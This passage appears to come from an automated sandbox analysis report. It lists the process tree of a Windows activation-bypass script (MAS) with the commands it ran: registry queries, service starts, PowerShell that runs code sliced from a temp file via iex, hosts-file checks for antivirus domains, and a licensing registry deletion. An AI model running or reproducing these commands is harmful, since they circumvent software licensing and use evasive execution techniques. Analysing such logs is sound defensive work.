        Modifies registry key
        
        PID:1040
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /v Type
        5⤵
        Modifies registry key
        
        PID:2272
    - - C:\Windows\System32\sc.exe
        
        sc start sppsvc
        5⤵
        Launches sc.exe
        
        PID:4272
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /S /D /c" echo "1056" "
        5⤵
        
        PID:5980
    - - C:\Windows\System32\findstr.exe
        
        findstr "577 225"
        5⤵
        
        PID:5712
    - - C:\Windows\System32\cmd.exe
        
        cmd /c "wmic path Win32_ComputerSystem get CreationClassName /value"
        5⤵
        
        PID:5920
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_ComputerSystem get CreationClassName /value
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4620
    - - C:\Windows\System32\find.exe
        
        find /i "computersystem"
        5⤵
        
        PID:2480
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c "powershell.exe $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1); $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule(2, $False); $TypeBuilder = $ModuleBuilder.DefineType(0); [void]$TypeBuilder.DefinePInvokeMethod('SLGetWindowsInformationDWORD', 'slc.dll', 'Public, Static', 1, [int], @([String], [int].MakeByRefType()), 1, 3); $Sku = 0; [void]$TypeBuilder.CreateType()::SLGetWindowsInformationDWORD('Kernel-BrandingInfo', [ref]$Sku); $Sku"
        5⤵
        
        PID:4152
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1); $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule(2, $False); $TypeBuilder = $ModuleBuilder.DefineType(0); [void]$TypeBuilder.DefinePInvokeMethod('SLGetWindowsInformationDWORD', 'slc.dll', 'Public, Static', 1, [int], @([String], [int].MakeByRefType()), 1, 3); $Sku = 0; [void]$TypeBuilder.CreateType()::SLGetWindowsInformationDWORD('Kernel-BrandingInfo', [ref]$Sku); $Sku
        6⤵
        
        PID:4072
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control\ProductOptions" /v OSProductPfn 2>nul
        5⤵
        
        PID:4492
      - C:\Windows\System32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\ProductOptions" /v OSProductPfn
        6⤵
        
        PID:5972
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c "wmic Path Win32_OperatingSystem Get OperatingSystemSKU /format:LIST" 2>nul
        5⤵
        
        PID:4052
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic Path Win32_OperatingSystem Get OperatingSystemSKU /format:LIST
        6⤵
        
        PID:2948
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe "$f=[io.file]::ReadAllText('C:\Windows\Temp\MAS_441363ff-a18a-4456-a22d-2c94fed2552c.cmd') -split ':winsubstatus\:.*';iex ($f[1])"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:180
    - - C:\Windows\System32\find.exe
        
        find /i "Subscription_is_activated"
        5⤵
        
        PID:2344
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c "powershell.exe $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1); $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule(2, $False); $TypeBuilder = $ModuleBuilder.DefineType(0); $meth = $TypeBuilder.DefinePInvokeMethod('BrandingFormatString', 'winbrand.dll', 'Public, Static', 1, [String], @([String]), 1, 3); $meth.SetImplementationFlags(128); $TypeBuilder.CreateType()::BrandingFormatString('%WINDOWS_LONG%')"
        5⤵
        
        PID:212
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1); $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule(2, $False); $TypeBuilder = $ModuleBuilder.DefineType(0); $meth = $TypeBuilder.DefinePInvokeMethod('BrandingFormatString', 'winbrand.dll', 'Public, Static', 1, [String], @([String]), 1, 3); $meth.SetImplementationFlags(128); $TypeBuilder.CreateType()::BrandingFormatString('%WINDOWS_LONG%')
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2424
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /S /D /c" echo "Windows 10 Pro" "
        5⤵
        
        PID:1800
    - - C:\Windows\System32\find.exe
        
        find /i "Windows"
        5⤵
        
        PID:436
    - - C:\Windows\System32\sc.exe
        
        sc start sppsvc
        5⤵
        Launches sc.exe
        
        PID:2268
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe "$job = Start-Job { (Get-WmiObject -Query 'SELECT * FROM SoftwareLicensingService').Version }; if (-not (Wait-Job $job -Timeout 20)) {write-host 'sppsvc is not working correctly. Help - https://massgrave.dev/troubleshoot'}"
        5⤵
        
        PID:4796
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2652
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path SoftwareLicensingProduct where (LicenseStatus='1' and GracePeriodRemaining='0' and PartialProductKey is not NULL AND LicenseDependsOn is NULL) get Name /value
        5⤵
        
        PID:5140
    - - C:\Windows\System32\findstr.exe
        
        findstr /i "Windows"
        5⤵
        
        PID:2528
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PROCESSOR_ARCHITECTURE
        5⤵
        
        PID:2476
      - C:\Windows\System32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PROCESSOR_ARCHITECTURE
        6⤵
        
        PID:6124
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c ver
        5⤵
        
        PID:4272
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c ping -n 1 l.root-servers.net
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4252
      - C:\Windows\System32\PING.EXE
        
        ping -n 1 l.root-servers.net
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5012
    - - C:\Windows\System32\reg.exe
        
        reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\taskcache\tasks" /f Path /s
        5⤵
        
        PID:3628
    - - C:\Windows\System32\find.exe
        
        find /i "AutoPico"
        5⤵
        
        PID:4580
    - - C:\Windows\System32\reg.exe
        
        reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\taskcache\tasks" /f Path /s
        5⤵
        
        PID:6120
    - - C:\Windows\System32\find.exe
        
        find /i "R@1n"
        5⤵
        
        PID:5920
    - - C:\Windows\System32\find.exe
        
        find /i "avira.com" C:\Windows\System32\drivers\etc\hosts
        5⤵
        
        PID:5764
    - - C:\Windows\System32\find.exe
        
        find /i "kaspersky.com" C:\Windows\System32\drivers\etc\hosts
        5⤵
        
        PID:3612
    - - C:\Windows\System32\find.exe
        
        find /i "virustotal.com" C:\Windows\System32\drivers\etc\hosts
        5⤵
        
        PID:4620
    - - C:\Windows\System32\find.exe
        
        find /i "mcafee.com" C:\Windows\System32\drivers\etc\hosts
        5⤵
        
        PID:3468
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /v DependOnService
        5⤵
        Modifies registry key
        
        PID:3896
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /v Description
        5⤵
        Modifies registry key
        
        PID:4612
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /v DisplayName
        5⤵
        Modifies registry key
        
        PID:4232
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /v ErrorControl
        5⤵
        Modifies registry key
        
        PID:5024
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /v ImagePath
        5⤵
        Modifies registry key
        
        PID:4448
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /v ObjectName
        5⤵
        Modifies registry key
        
        PID:1580
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /v Start
        5⤵
        Modifies registry key
        
        PID:860
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /v Type
        5⤵
        Modifies registry key
        
        PID:2440
    - - C:\Windows\System32\sc.exe
        
        sc start sppsvc
        5⤵
        Launches sc.exe
        
        PID:3236
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /S /D /c" echo "1056" "
        5⤵
        
        PID:5052
    - - C:\Windows\System32\findstr.exe
        
        findstr "577 225"
        5⤵
        
        PID:3868
    - - C:\Windows\System32\sc.exe
        
        sc query Null
        5⤵
        Launches sc.exe
        
        PID:5928
    - - C:\Windows\System32\sc.exe
        
        sc start ClipSVC
        5⤵
        Launches sc.exe
        
        PID:832
    - - C:\Windows\System32\sc.exe
        
        sc query ClipSVC
        5⤵
        Launches sc.exe
        
        PID:5080
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v DependOnService
        5⤵
        Modifies registry key
        
        PID:5344
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v Description
        5⤵
        Modifies registry key
        
        PID:4108
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v DisplayName
        5⤵
        Modifies registry key
        
        PID:3048
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v ErrorControl
        5⤵
        Modifies registry key
        
        PID:6020
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v ImagePath
        5⤵
        Modifies registry key
        
        PID:4540
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v ObjectName
        5⤵
        Modifies registry key
        
        PID:4980
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v Start
        5⤵
        Modifies registry key
        
        PID:1756
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v Type
        5⤵
        Modifies registry key
        
        PID:180
    - - C:\Windows\System32\sc.exe
        
        sc start wlidsvc
        5⤵
        Launches sc.exe
        
        PID:5948
    - - C:\Windows\System32\sc.exe
        
        sc query wlidsvc
        5⤵
        Launches sc.exe
        
        PID:4996
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\wlidsvc /v DependOnService
        5⤵
        Modifies registry key
        
        PID:4772
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\wlidsvc /v Description
        5⤵
        Modifies registry key
        
        PID:6136
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\wlidsvc /v DisplayName
        5⤵
        Modifies registry key
        
        PID:4380
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\wlidsvc /v ErrorControl
        5⤵
        Modifies registry key
        
        PID:3272
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\wlidsvc /v ImagePath
        5⤵
        Modifies registry key
        
        PID:2268
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\wlidsvc /v ObjectName
        5⤵
        Modifies registry key
        
        PID:2512
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\wlidsvc /v Start
        5⤵
        Modifies registry key
        
        PID:3024
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\wlidsvc /v Type
        5⤵
        Modifies registry key
        
        PID:4568
    - - C:\Windows\System32\sc.exe
        
        sc start sppsvc
        5⤵
        Launches sc.exe
        
        PID:2424
    - - C:\Windows\System32\sc.exe
        
        sc query sppsvc
        5⤵
        Launches sc.exe
        
        PID:2796
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v DependOnService
        5⤵
        Modifies registry key
        
        PID:4084
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v Description
        5⤵
        Modifies registry key
        
        PID:1196
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v DisplayName
        5⤵
        Modifies registry key
        
        PID:1640
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v ErrorControl
        5⤵
        Modifies registry key
        
        PID:112
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v ImagePath
        5⤵
        Modifies registry key
        
        PID:3780
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v ObjectName
        5⤵
        Modifies registry key
        
        PID:4640
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v Start
        5⤵
        Modifies registry key
        
        PID:5244
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v Type
        5⤵
        Modifies registry key
        
        PID:652
    - - C:\Windows\System32\sc.exe
        
        sc start KeyIso
        5⤵
        Launches sc.exe
        
        PID:5916
    - - C:\Windows\System32\sc.exe
        
        sc query KeyIso
        5⤵
        Launches sc.exe
        
        PID:6068
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v DependOnService
        5⤵
        Modifies registry key
        
        PID:4316
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v Description
        5⤵
        Modifies registry key
        
        PID:5976
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v DisplayName
        5⤵
        Modifies registry key
        
        PID:5740
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v ErrorControl
        5⤵
        Modifies registry key
        
        PID:5876
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v ImagePath
        5⤵
        Modifies registry key
        
        PID:5008
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v ObjectName
        5⤵
        Modifies registry key
        
        PID:4672
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v Start
        5⤵
        Modifies registry key
        
        PID:4632
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v Type
        5⤵
        Modifies registry key
        
        PID:4196
    - - C:\Windows\System32\sc.exe
        
        sc start LicenseManager
        5⤵
        Launches sc.exe
        
        PID:5572
    - - C:\Windows\System32\sc.exe
        
        sc query LicenseManager
        5⤵
        Launches sc.exe
        
        PID:1940
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\LicenseManager /v DependOnService
        5⤵
        Modifies registry key
        
        PID:3264
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\LicenseManager /v Description
        5⤵
        Modifies registry key
        
        PID:2448
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\LicenseManager /v DisplayName
        5⤵
        Modifies registry key
        
        PID:6124
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\LicenseManager /v ErrorControl
        5⤵
        Modifies registry key
        
        PID:2272
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\LicenseManager /v ImagePath
        5⤵
        Modifies registry key
        
        PID:5576
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\LicenseManager /v ObjectName
        5⤵
        Modifies registry key
        
        PID:5712
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\LicenseManager /v Start
        5⤵
        Modifies registry key
        
        PID:3484
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\LicenseManager /v Type
        5⤵
        Modifies registry key
        
        PID:5748
    - - C:\Windows\System32\sc.exe
        
        sc start Winmgmt
        5⤵
        Launches sc.exe
        
        PID:3628
    - - C:\Windows\System32\sc.exe
        
        sc query Winmgmt
        5⤵
        Launches sc.exe
        
        PID:4496
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v DependOnService
        5⤵
        Modifies registry key
        
        PID:2168
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v Description
        5⤵
        Modifies registry key
        
        PID:5920
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v DisplayName
        5⤵
        Modifies registry key
        
        PID:5764
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v ErrorControl
        5⤵
        Modifies registry key
        
        PID:3612
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v ImagePath
        5⤵
        Modifies registry key
        
        PID:4056
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v ObjectName
        5⤵
        Modifies registry key
        
        PID:5628
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v Start
        5⤵
        Modifies registry key
        
        PID:428
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v Type
        5⤵
        Modifies registry key
        
        PID:5124
    - - C:\Windows\System32\sc.exe
        
        sc start ClipSVC
        5⤵
        Launches sc.exe
        
        PID:4232
    - - C:\Windows\System32\sc.exe
        
        sc start wlidsvc
        5⤵
        Launches sc.exe
        
        PID:5024
    - - C:\Windows\System32\sc.exe
        
        sc start sppsvc
        5⤵
        Launches sc.exe
        
        PID:4448
    - - C:\Windows\System32\sc.exe
        
        sc start KeyIso
        5⤵
        Launches sc.exe
        
        PID:1524
    - - C:\Windows\System32\sc.exe
        
        sc start LicenseManager
        5⤵
        Launches sc.exe
        
        PID:3100
    - - C:\Windows\System32\sc.exe
        
        sc start Winmgmt
        5⤵
        Launches sc.exe
        
        PID:2304
    - - C:\Windows\System32\sc.exe
        
        sc query ClipSVC
        5⤵
        Launches sc.exe
        
        PID:2352
    - - C:\Windows\System32\find.exe
        
        find /i "RUNNING"
        5⤵
        
        PID:3236
    - - C:\Windows\System32\sc.exe
        
        sc start ClipSVC
        5⤵
        Launches sc.exe
        
        PID:2948
    - - C:\Windows\System32\sc.exe
        
        sc query wlidsvc
        5⤵
        Launches sc.exe
        
        PID:1400
    - - C:\Windows\System32\find.exe
        
        find /i "RUNNING"
        5⤵
        
        PID:4052
    - - C:\Windows\System32\sc.exe
        
        sc start wlidsvc
        5⤵
        Launches sc.exe
        
        PID:832
    - - C:\Windows\System32\sc.exe
        
        sc query sppsvc
        5⤵
        Launches sc.exe
        
        PID:5992
    - - C:\Windows\System32\find.exe
        
        find /i "RUNNING"
        5⤵
        
        PID:2284
    - - C:\Windows\System32\sc.exe
        
        sc start sppsvc
        5⤵
        Launches sc.exe
        
        PID:4108
    - - C:\Windows\System32\sc.exe
        
        sc query KeyIso
        5⤵
        Launches sc.exe
        
        PID:5596
    - - C:\Windows\System32\find.exe
        
        find /i "RUNNING"
        5⤵
        
        PID:4660
    - - C:\Windows\System32\sc.exe
        
        sc start KeyIso
        5⤵
        Launches sc.exe
        
        PID:2344
    - - C:\Windows\System32\sc.exe
        
        sc query LicenseManager
        5⤵
        Launches sc.exe
        
        PID:4460
    - - C:\Windows\System32\find.exe
        
        find /i "RUNNING"
        5⤵
        
        PID:4980
    - - C:\Windows\System32\sc.exe
        
        sc start LicenseManager
        5⤵
        Launches sc.exe
        
        PID:648
    - - C:\Windows\System32\sc.exe
        
        sc query Winmgmt
        5⤵
        Launches sc.exe
        
        PID:5860
    - - C:\Windows\System32\find.exe
        
        find /i "RUNNING"
        5⤵
        
        PID:1420
    - - C:\Windows\System32\sc.exe
        
        sc start Winmgmt
        5⤵
        Launches sc.exe
        
        PID:5652
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\State" /v ImageState
        5⤵
        
        PID:4772
      - C:\Windows\System32\reg.exe
        
        reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\State" /v ImageState
        6⤵
        
        PID:2736
    - - C:\Windows\System32\reg.exe
        
        reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinPE" /v InstRoot
        5⤵
        
        PID:4576
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c powershell.exe "$f=[io.file]::ReadAllText('C:\Windows\Temp\MAS_441363ff-a18a-4456-a22d-2c94fed2552c.cmd') -split ':wpatest\:.*';iex ($f[1])" 2>nul
        5⤵
        
        PID:5648
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe "$f=[io.file]::ReadAllText('C:\Windows\Temp\MAS_441363ff-a18a-4456-a22d-2c94fed2552c.cmd') -split ':wpatest\:.*';iex ($f[1])"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1688
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /S /D /c" echo "7" "
        5⤵
        
        PID:112
    - - C:\Windows\System32\find.exe
        
        find /i "Error Found"
        5⤵
        
        PID:5348
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v EditionID 2>nul
        5⤵
        
        PID:1840
      - C:\Windows\System32\reg.exe
        
        reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v EditionID
        6⤵
        
        PID:3596
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe "try { $null=([WMISEARCHER]'SELECT * FROM SoftwareLicensingService').Get().Version; exit 0 } catch { exit $_.Exception.InnerException.HResult }"
        5⤵
        
        PID:216
    - - C:\Windows\System32\cmd.exe
        
        cmd /c exit /b 0
        5⤵
        
        PID:4424
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_ComputerSystem get CreationClassName /value
        5⤵
        
        PID:3612
    - - C:\Windows\System32\find.exe
        
        find /i "computersystem"
        5⤵
        
        PID:2920
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /S /D /c" echo "0" "
        5⤵
        
        PID:2304
    - - C:\Windows\System32\findstr.exe
        
        findstr /i "0x800410 0x800440"
        5⤵
        
        PID:1004
    - - C:\Windows\System32\reg.exe
        
        reg query "HKU\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\PersistedTSReArmed"
        5⤵
        
        PID:5292
    - - C:\Windows\System32\reg.exe
        
        reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ClipSVC\Volatile\PersistedSystemState"
        5⤵
        
        PID:2968
    - - C:\Windows\System32\reg.exe
        
        reg query "HKU\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion"
        5⤵
        
        PID:1620
    - - C:\Windows\System32\reg.exe
        
        reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe"
        5⤵
        
        PID:1756
    - - C:\Windows\System32\reg.exe
        
        reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sppsvc.exe"
        5⤵
        
        PID:5316
    - - C:\Windows\System32\reg.exe
        
        reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sppsvc.exe\PerfOptions"
        5⤵
        
        PID:5948
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "SkipRearm" 2>nul
        5⤵
        
        PID:2684
      - C:\Windows\System32\reg.exe
        
        reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "SkipRearm"
        6⤵
        
        PID:2148
    - - C:\Windows\System32\reg.exe
        
        reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Plugins\Objects\msft:rm/algorithm/hwid/4.0" /f ba02fed39662 /d
        5⤵
        
        PID:4380
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v TokenStore 2>nul
        5⤵
        
        PID:4204
      - C:\Windows\System32\reg.exe
        
        reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v TokenStore
        6⤵
        
        PID:5064
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c "wmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and PartialProductKey is not null) get ID /VALUE" 2>nul
        5⤵
        
        PID:2796
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and PartialProductKey is not null) get ID /VALUE
        6⤵
        
        PID:4084
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c powershell.exe "(Get-ScheduledTask -TaskName 'SvcRestartTask' -TaskPath '\Microsoft\Windows\SoftwareProtectionPlatform\').State" 2>nul
        5⤵
        
        PID:5996
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe "(Get-ScheduledTask -TaskName 'SvcRestartTask' -TaskPath '\Microsoft\Windows\SoftwareProtectionPlatform\').State"
        6⤵
        
        PID:5964
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /S /D /c" echo "
        5⤵
        
        PID:2276
    - - C:\Windows\System32\find.exe
        
        find /i "Ready"
        5⤵
        
        PID:5572
    - - C:\Windows\System32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "actionlist" /f
        5⤵
        
        PID:2136
    - - C:\Windows\System32\reg.exe
        
        reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask"
        5⤵
        
        PID:6084
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe "$acl = (Get-Acl 'C:\Windows\System32\spp\store\2.0' | fl | Out-String); if (-not ($acl -match 'NT SERVICE\\sppsvc Allow FullControl') -or ($acl -match 'NT SERVICE\\sppsvc Deny')) {Exit 2}"
        5⤵
        
        PID:3992
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe "$acl = (Get-Acl 'HKLM:\SYSTEM\WPA' | fl | Out-String); if (-not ($acl -match 'NT SERVICE\\sppsvc Allow QueryValues, EnumerateSubKeys, WriteKey') -or ($acl -match 'NT SERVICE\\sppsvc Deny')) {Exit 2}"
        5⤵
        
        PID:5876
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe "$acl = (Get-Acl 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' | fl | Out-String); if (-not ($acl -match 'NT SERVICE\\sppsvc Allow SetValue') -or ($acl -match 'NT SERVICE\\sppsvc Deny')) {Exit 2}"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4436
    - - C:\Windows\System32\reg.exe
        
        reg query "HKU\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion"
        5⤵
        
        PID:5972
    - - C:\Windows\System32\reg.exe
        
        reg query "HKU\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Policies"
        5⤵
        
        PID:860
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
